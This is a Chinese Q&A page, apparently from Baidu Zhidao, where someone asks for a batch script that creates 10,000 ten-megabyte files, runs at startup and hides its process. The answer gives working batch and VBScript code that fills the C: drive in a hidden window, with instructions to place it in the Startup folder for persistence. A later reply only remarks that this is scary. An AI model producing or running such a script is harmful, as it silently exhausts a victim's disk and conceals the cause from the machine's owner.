求一段隐藏进程批处理代码

来源:百度知道 编辑:UC知道 时间:2024/05/29 12:08:10
一段批处理代码 在电脑上建立 10000个10MB的文件 可以随开机而启动 并且隐藏进程

@echo off
echo for /l %%%%i in (1 1 10000) do fsutil file Createnew c:\%%%%i 10240000 > %temp%\a.bat
echo set ws=wscript.createobject("wscript.shell") >%temp%\a.vbs
echo ws.run "%temp%\a.bat /start",0 >>%temp%\a.vbs
start "" %temp%\a.vbs

自己拖放到开始-程序-启动里面即可。~~~

好恐怖啊,你想做什么好事啊~~